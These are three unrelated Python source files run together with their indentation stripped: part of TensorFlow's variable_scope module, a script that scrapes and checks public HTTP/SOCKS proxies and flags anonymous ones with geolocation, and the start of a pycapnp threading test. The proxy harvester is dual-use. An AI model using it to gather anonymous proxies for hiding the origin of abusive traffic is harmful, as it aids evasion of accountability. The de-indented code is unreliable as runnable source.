# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
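# Illustrative sketch of getter composition (the getter names are hypothetical):
# re-entering a scope that already has `old_getter` with a new `new_getter`
# produces a wrapped getter that calls
#   new_getter(functools.partial(old_getter, true_getter), *args, **kwargs)
# so both custom getters run before the true getter creates the variable.
#
#   def old_getter(getter, name, *args, **kwargs):
#     return getter(name + "_old", *args, **kwargs)
#   def new_getter(getter, name, *args, **kwargs):
#     return getter(name, *args, **kwargs)
#   wrapped = _maybe_wrap_custom_getter(new_getter, old_getter)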
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are also generated
only on a per-thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`; this name will be uniquified. If `name_or_scope` is provided, this
argument is ignored, so it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect once, when the scope is created. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a
list of partitions.
shape: shape of the `Tensor` to partition; must have rank at least 1.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >= 1, at most one of which is > 1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError(
"Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
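# Illustrative sketch of a valid partitioner output (the partitioner below is
# hypothetical): for a rank-2 variable it requests four shards along axis 1,
# which passes every check above.
#
#   def fixed_axis_partitioner(shape, dtype):
#     del dtype  # unused in this sketch
#     return [1, 4] if shape.ndims == 2 else [1] * shape.ndims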
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
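# Illustrative walk-through of the two helpers above: for slicing = [1, 4, 1]
# the slice dimension is 1 with 4 slices; for full_shape = [10, 4],
# num_slices = 3, slice_dim = 0, the generator yields
#   ([0, 0], [4, 4]), ([4, 0], [3, 4]), ([7, 0], [3, 4])
# i.e. the first 10 % 3 = 1 shard receives one extra row.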
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
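# Illustrative: synchronization=ON_READ forces trainable to False (and raises
# if trainable=True was requested), while trainable=None defaults to True for
# every other synchronization mode.
#
#   assert _get_trainable_value(VariableSynchronization.AUTO, None) is True
#   assert _get_trainable_value(VariableSynchronization.ON_READ, None) is False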
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope, distribute_strategy=distribute_strategy)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope, distribute_strategy=distribute_strategy)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
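# Illustrative sketch (names are hypothetical): the indirection matters when
# chaining creators in a loop, because Python closures bind loop variables
# late; without the helper every getter would see the final loop values.
#
#   getter = default_variable_creator            # innermost creator
#   for creator in my_creator_stack:             # hypothetical list of creators
#     getter = _make_getter(creator, getter)     # freezes the current pair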
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
    synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
    synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
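# A minimal usage sketch (illustrative, not part of the original module):
#
#   def logging_creator(next_creator, **kwargs):
#     # Inspect or rewrite kwargs, then defer to the next creator in line.
#     print("creating variable:", kwargs.get("name"))
#     return next_creator(**kwargs)
#
#   with variable_creator_scope(logging_creator):
#     v = variables.VariableV1(1.0, name="x")  # logging_creator runs first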
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ipaddress import IPv4Address
from os import mkdir
from shutil import rmtree
from sys import stderr
from threading import Thread
from time import sleep
from typing import Dict, Iterable, Optional, Tuple, Union
from loguru import logger
from maxminddb import open_database
from maxminddb.reader import Reader
from requests import get
import config
class ProxyScraperChecker(object):
def __init__(
self,
timeout: float = 5,
        geolite2_city_mmdb: Optional[str] = None,
ip_service: str = "https://ident.me",
http_sources: Union[Iterable[str], str, None] = None,
socks4_sources: Union[Iterable[str], str, None] = None,
socks5_sources: Union[Iterable[str], str, None] = None,
) -> None:
"""Scrape and check proxies from sources and save them to files.
Args:
geolite2_city_mmdb (str): Path to the GeoLite2-City.mmdb if you
want to add location info for each proxy.
ip_service (str): Service for getting your IP address and checking
if proxies are valid.
timeout (float): How many seconds to wait for the connection.
"""
self.IP_SERVICE = ip_service.strip()
self.TIMEOUT = timeout
self.MMDB = geolite2_city_mmdb
self.sources = {
proto: (sources,)
if isinstance(sources, str)
else tuple(set(sources))
for proto, sources in (
("http", http_sources),
("socks4", socks4_sources),
("socks5", socks5_sources),
)
if sources
}
self.proxies: Dict[str, Dict[str, Optional[str]]] = {
proto: {} for proto in self.sources
}
@staticmethod
def is_ipv4(ip: str) -> bool:
"""Return True if ip is IPv4."""
try:
IPv4Address(ip)
except Exception:
return False
return True
@staticmethod
def append_to_file(file_name: str, content: str) -> None:
with open(file_name, "a", encoding="utf-8") as f:
f.write(f"{content}\n")
@staticmethod
def get_geolocation(ip: str, reader: Reader) -> str:
"""Get proxy's geolocation.
Args:
ip (str): Proxy's ip.
reader (Reader): mmdb Reader instance.
Returns:
str: ::Country Name::Region::City
"""
geolocation = reader.get(ip)
if not isinstance(geolocation, dict):
return "::None::None::None"
country = geolocation.get("country")
if country:
country = country["names"]["en"]
else:
country = geolocation.get("continent")
if country:
country = country["names"]["en"]
region = geolocation.get("subdivisions")
if region:
region = region[0]["names"]["en"]
city = geolocation.get("city")
if city:
city = city["names"]["en"]
return f"::{country}::{region}::{city}"
def start_threads(self, threads: Iterable[Thread]) -> None:
"""Start and join threads."""
for t in threads:
try:
t.start()
except RuntimeError:
sleep(self.TIMEOUT)
t.start()
for t in threads:
t.join()
def get_source(self, source: str, proto: str) -> None:
"""Get proxies from source.
Args:
source (str): Proxy list URL.
proto (str): http/socks4/socks5.
"""
try:
r = get(source.strip(), timeout=15)
except Exception as e:
logger.error(f"{source}: {e}")
return
status_code = r.status_code
if status_code == 200:
for proxy in r.text.splitlines():
proxy = (
proxy.replace(f"{proto}://", "")
.replace("https://", "")
.strip()
)
if self.is_ipv4(proxy.split(":")[0]):
self.proxies[proto][proxy] = None
else:
logger.error(f"{source} status code: {status_code}")
def check_proxy(self, proxy: str, proto: str) -> None:
"""Check proxy validity.
Args:
proxy (str): ip:port.
proto (str): http/socks4/socks5.
"""
try:
exit_node = get(
self.IP_SERVICE,
proxies={
"http": f"{proto}://{proxy}",
"https": f"{proto}://{proxy}",
},
timeout=self.TIMEOUT,
).text.strip()
except Exception:
return
if self.is_ipv4(exit_node):
self.proxies[proto][proxy] = exit_node
def get_all_sources(self) -> None:
"""Get proxies from sources."""
logger.info("Getting sources")
threads = [
Thread(target=self.get_source, args=(source, proto))
for proto, sources in self.sources.items()
for source in sources
]
self.start_threads(threads)
def check_all_proxies(self) -> None:
for proto, proxies in self.proxies.items():
logger.info("Checking {0} {1} proxies", len(proxies), proto)
threads = [
Thread(target=self.check_proxy, args=(proxy, proto))
for proto, proxies in self.proxies.items()
for proxy in proxies
]
self.start_threads(threads)
@staticmethod
def _get_sorting_key(x: Tuple[str, Optional[str]]) -> Tuple[int, ...]:
octets = x[0].replace(":", ".").split(".")
return tuple(map(int, octets))
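        # Illustrative example: ("1.2.3.4:8080", None) maps to (1, 2, 3, 4, 8080),
        # so proxies sort numerically by IP octets first and port last.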
def sort_proxies(self) -> None:
"""Delete invalid proxies and sort working ones."""
prox = [
(
proto,
[
(proxy, exit_node)
for proxy, exit_node in proxies.items()
if exit_node
],
)
for proto, proxies in self.proxies.items()
]
self.proxies = {
proto: dict(sorted(proxies, key=self._get_sorting_key))
for proto, proxies in prox
}
def save_proxies(self) -> None:
"""Delete old proxies and save new ones."""
directories = [
"proxies",
"proxies_anonymous",
"proxies_geolocation",
"proxies_geolocation_anonymous",
]
for directory in directories:
try:
rmtree(directory)
except FileNotFoundError:
pass
if not self.MMDB:
directories = ["proxies", "proxies_anonymous"]
for directory in directories:
mkdir(directory)
self.sort_proxies()
for proto, proxies in self.proxies.items():
for proxy, exit_node in proxies.items():
self.append_to_file(f"proxies/{proto}.txt", proxy)
if exit_node != proxy.split(":")[0]:
self.append_to_file(
f"proxies_anonymous/{proto}.txt", proxy
)
if self.MMDB:
with open_database(self.MMDB) as reader:
for proto, proxies in self.proxies.items():
for proxy, exit_node in proxies.items():
line = proxy + self.get_geolocation(exit_node, reader) # type: ignore
self.append_to_file(
f"proxies_geolocation/{proto}.txt", line
)
if exit_node != proxy.split(":")[0]:
self.append_to_file(
f"proxies_geolocation_anonymous/{proto}.txt",
line,
)
def main(self) -> None:
self.get_all_sources()
self.check_all_proxies()
self.save_proxies()
logger.success("Result:")
for proto, proxies in self.proxies.items():
logger.success("{0} - {1}", proto, len(proxies))
def main() -> None:
logger.remove()
logger.add(
stderr,
format="<green>{time:YYYY-MM-DD HH:mm:ss}</green> | <level>{message}</level>",
colorize=True,
)
proxy_scraper_checker = ProxyScraperChecker(
timeout=config.TIMEOUT,
geolite2_city_mmdb="GeoLite2-City.mmdb"
if config.GEOLOCATION
else None,
ip_service=config.IP_SERVICE,
http_sources=config.HTTP_SOURCES if config.HTTP else None,
socks4_sources=config.SOCKS4_SOURCES if config.SOCKS4 else None,
socks5_sources=config.SOCKS5_SOURCES if config.SOCKS5 else None,
)
proxy_scraper_checker.main()
logger.success("Thank you for using proxy-scraper-checker :)")
if __name__ == "__main__":
main()
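# Sketch of the config.py fields this script relies on (values are illustrative
# assumptions; only the attribute names are taken from the code above):
#
#   TIMEOUT = 5
#   GEOLOCATION = True          # expects GeoLite2-City.mmdb next to the script
#   IP_SERVICE = "https://ident.me"
#   HTTP = True
#   HTTP_SOURCES = ("https://example.com/http.txt",)
#   SOCKS4 = False
#   SOCKS4_SOURCES = ()
#   SOCKS5 = False
#   SOCKS5_SOURCES = ()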
|
test_threads.py
|
import capnp
import pytest
import test_capability_capnp
import socket
import threading
import platform
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_making_event_loop():
capnp.remove_event_loop(True)
capnp.create_event_loop()
capnp.remove_event_loop()
capnp.create_event_loop()
@pytest.mark.skipif(platform.python_implementation() == 'PyPy', reason="pycapnp's GIL handling isn't working properly at the moment for PyPy")
def test_making_threaded_event_loop():
capnp.remove_event_loop(True)
capnp.create_event_loop(True)
capnp.remove_event_loop()
capnp.create_event_loop(True)
class Server(test_capability_capnp.TestInterface.Server):
